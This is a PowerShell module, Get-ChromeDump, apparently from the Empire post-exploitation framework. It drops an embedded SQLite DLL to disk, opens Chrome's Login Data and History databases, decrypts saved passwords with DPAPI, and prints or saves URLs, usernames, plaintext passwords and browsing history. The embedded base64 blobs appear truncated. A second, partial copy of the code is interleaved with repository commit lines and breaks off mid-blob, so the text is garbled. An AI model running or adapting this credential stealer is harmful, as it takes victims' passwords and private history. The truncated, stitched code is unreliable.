Empire/data/module_source/collection/Get-ChromeDump.ps1

Function Get-ChromeDump{

  <#
  .SYNOPSIS
  This function returns any passwords and history stored in the chrome sqlite databases.

  .DESCRIPTION
  This function uses the System.Data.SQLite assembly to parse the different sqlite db files used by chrome to save passwords and browsing history. The System.Data.SQLite assembly
  cannot be loaded from memory. This is a limitation for assemblies that contain any unmanaged code and/or compiled without the /clr:safe option.

  .PARAMETER OutFile
  Switch to dump all results out to a file.

  .EXAMPLE

  Get-ChromeDump -OutFile "$env:HOMEPATH\chromepwds.txt"

  Dump All chrome passwords and history to the specified file

  .LINK
  http://www.xorrior.com

  #>

  [CmdletBinding()]
  param(
    [Parameter(Mandatory = $False)]
    [string]$OutFile
  )
    #Add the required assembly for decryption

    Add-Type -Assembly System.Security

    #Check to see if the script is being run as SYSTEM. Not going to work.
    if(([System.Security.Principal.WindowsIdentity]::GetCurrent()).IsSystem){
      Write-Warning "Unable to decrypt passwords contained in Login Data file as SYSTEM."
      $NoPasswords = $True
    }

    if([IntPtr]::Size -eq 8)
    {
        #64 bit version
        $assembly = "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
    }
    else
    {
        #32 bit version
        $assembly = "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
    
    }
    #Unable to load this assembly from memory. The assembly was most likely not compiled using /clr:safe and contains unmanaged code. Loading assemblies of this type from memory will not work. Therefore we have to load it from disk.
    #DLL for sqlite queries and parsing
    #http://system.data.sqlite.org/index.html/doc/trunk/www/downloads.wiki
    Write-Verbose "[+]System.Data.SQLite.dll will be written to disk"
    
   
    $content = [System.Convert]::FromBase64String($assembly) 
    
    
    
    $assemblyPath = "$($env:LOCALAPPDATA)\System.Data.SQLite.dll" 
    
    
    if(Test-path $assemblyPath)
    {
      try 
      {
        Add-Type -Path $assemblyPath
      }
      catch 
      {
        Write-Warning "[!]Unable to load SQLite assembly"
        break
      }
    }
    else
    {
        [System.IO.File]::WriteAllBytes($assemblyPath,$content)
        Write-Verbose "[+]Assembly for SQLite written to $assemblyPath"
        try 
        {
            Add-Type -Path $assemblyPath
        }
        catch 
        {
            Write-Warning "[!]Unable to load SQLite assembly"
            break
        }
    }

    #Check if Chrome is running. The data files are locked while Chrome is running 

    if(Get-Process | Where-Object {$_.Name -like "*chrome*"}){
      Write-Warning "[!]Cannot parse Data files while chrome is running"
      break
    }

    #grab the path to Chrome user data
    $OS = [environment]::OSVersion.Version
    if($OS.Major -ge 6){
      $chromepath = "$($env:LOCALAPPDATA)\Google\Chrome\User Data\Default"
    }
    else{
      $chromepath = "$($env:HOMEDRIVE)\$($env:HOMEPATH)\Local Settings\Application Data\Google\Chrome\User Data\Default"
    }
    
    if(!(Test-path $chromepath)){
      Throw "Chrome user data directory does not exist"
    }
    else{
      #DB for CC and other info
      if(Test-Path -Path "$chromepath\Web Data"){$WebDatadb = "$chromepath\Web Data"}
      #DB for passwords 
      if(Test-Path -Path "$chromepath\Login Data"){$loginDatadb = "$chromepath\Login Data"}
      #DB for history
      if(Test-Path -Path "$chromepath\History"){$historydb = "$chromepath\History"}
      #$cookiesdb = "$chromepath\Cookies"

    }

    if(!($NoPasswords)){ 

      #Parse the login data DB
      $connStr = "Data Source=$loginDatadb; Version=3;"

      $connection = New-Object System.Data.SQLite.SQLiteConnection($connStr)

      $OpenConnection = $connection.OpenAndReturn()

      Write-Verbose "Opened DB file $loginDatadb"

      $query = "SELECT * FROM logins;"

      $dataset = New-Object System.Data.DataSet

      $dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$OpenConnection)

      [void]$dataAdapter.fill($dataset)

      $logins = @()

      Write-Verbose "Parsing results of query $query"

      $dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
        $encryptedBytes = $_.password_value
        $username = $_.username_value
        $url = $_.action_url
        $decryptedBytes = [Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)
        $plaintext = [System.Text.Encoding]::ASCII.GetString($decryptedBytes)
        $login = New-Object PSObject -Property @{
          URL = $url
          PWD = $plaintext
          User = $username 
        }

        $logins += $login
      }
    }

    #Parse the History DB
    $connString = "Data Source=$historydb; Version=3;"

    $connection = New-Object System.Data.SQLite.SQLiteConnection($connString)

    $Open = $connection.OpenAndReturn()

    Write-Verbose "Opened DB file $historydb"

    $DataSet = New-Object System.Data.DataSet

    $query = "SELECT * FROM urls;"

    $dataAdapter = New-Object System.Data.SQLite.SQLiteDataAdapter($query,$Open)

    [void]$dataAdapter.fill($DataSet)

    $History = @()
    $dataset.Tables | Select-Object -ExpandProperty Rows | ForEach-Object {
      $HistoryInfo = New-Object PSObject -Property @{
        Title = $_.title 
        URL = $_.url
      }
      $History += $HistoryInfo
    }
    
    if(!($OutFile)){
      "[*]CHROME PASSWORDS`n"
      $logins | Format-Table URL,User,PWD -AutoSize | Out-String

      "[*]CHROME HISTORY`n"

      $History | Format-List Title,URL | Out-String
    }
    else {
        "[*]LOGINS`n" | Out-File $OutFile 
        $logins | Out-File $OutFile -Append

        "[*]HISTORY`n" | Out-File $OutFile -Append
        $History | Out-File $OutFile -Append  

    }

    
    Write-Warning "[!] Please remove SQLite assembly from here: $assemblyPath"

    
    
}
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`Function Get-ChromeDump{`

			`<#`
			`.SYNOPSIS`
			`This function returns any passwords and history stored in the chrome sqlite databases.`

			`.DESCRIPTION`
			`This function uses the System.Data.SQLite assembly to parse the different sqlite db files used by chrome to save passwords and browsing history. The System.Data.SQLite assembly`
			`cannot be loaded from memory. This is a limitation for assemblies that contain any unmanaged code and/or compiled without the /clr:safe option.`

			`.PARAMETER OutFile`
			`Switch to dump all results out to a file.`

			`.EXAMPLE`

			`Get-ChromeDump -OutFile "$env:HOMEPATH\chromepwds.txt"`

			`Dump All chrome passwords and history to the specified file`

			`.LINK`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`http://www.xorrior.com`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00
			`#>`

			`[CmdletBinding()]`
			`param(`
			`[Parameter(Mandatory = $False)]`
			`[string]$OutFile`
			`)`
			`#Add the required assembly for decryption`

			`Add-Type -Assembly System.Security`

			`#Check to see if the script is being run as SYSTEM. Not going to work.`
			`if(([System.Security.Principal.WindowsIdentity]::GetCurrent()).IsSystem){`
Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`Write-Warning "Unable to decrypt passwords contained in Login Data file as SYSTEM."`
Added ChromeDump and FoxDump modules 2015-11-25 16:55:36 +00:00			`$NoPasswords = $True`
			`}`

Added 64-bit version of Assembly in ChromeDump. Removed unnecessary functions in FoxDump 2015-11-28 21:34:13 +00:00			`if([IntPtr]::Size -eq 8)`
			`{`
			`#64 bit version`
Fix for error when loading SQLite assembly 2016-06-09 13:35:28 +00:00			$assembly = "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